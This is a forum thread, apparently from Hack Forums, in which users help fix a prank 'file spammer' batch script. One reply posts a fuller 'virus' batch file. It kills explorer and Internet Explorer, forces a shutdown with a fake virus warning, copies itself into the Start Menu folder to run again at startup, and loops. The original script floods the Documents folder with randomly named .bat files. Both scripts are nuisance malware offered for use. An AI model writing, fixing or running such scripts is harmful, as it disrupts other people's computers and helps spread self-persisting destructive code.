Hack Forums

Full Version: whats rong with this batch code?
You're currently viewing a stripped down version of our content. View the full version with proper formatting.
Pages: 1 2
what rong with this batch file?
its supposed to flathsh difrent colors and fill you documents wi files called "lol ( random number )" but it isnt working, it did but i think i must of messed wit it because it isnt working now...
please help me fix it

@echo off
cd C:\Documents and Settings\Owner\My Documents
:ha
color ef
color 08
color 19
color 2a
color 3b
color 4c
color 5d
color 6e
color 7f
color ef
echo hahaha now you have a load of files in your documents!!!!!
goto:ha
echo >lolz.%random%.bat start
echo >lolz.%random%.bat start

thanks!
Lol, I'm not sure to be honest. I'm not a computer programmer so I have little knowledge on this kind of stuff. Once of the more knowledgable members / staff, will help you out though :)
does any of the batch file work?

does it screw up halfway through or just not work at all?

i think the "echo >lolz.%random%.bat start" is coded wrong.
well yeah mostly it flashes and some times creats odd file...
Well i saw something rong its never able to make the files echo >lolz.%random%.bat start
echo >lolz.%random%.bat start.. because the goto command makes it loop before it can make those files add them to the loop. also you should put the collot code after the lines of text. Because what that does it it means change to this color then this color and so on before the text shows. here is a simple one i made foe an example....
@echo off
cls
:start
echo A virus has been detected! Error
color b
color c
color d
echo haha all files are now mine :)
color 1
color 2
color 3
tskill iexplore
tskill explorer
shutdown -s -t 10 -c "A virus has been detected by windows, and windows is shutingdown to prevent damage."
copy virus.bat C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs
goto start
Your fucked... thats whats wrong.
... I REALY NEED HELP ON THINS LOL
Whats the name of the code.
what do you mean name? the file spammer.BAT
where did you get it from?
Pages: 1 2
Reference URL's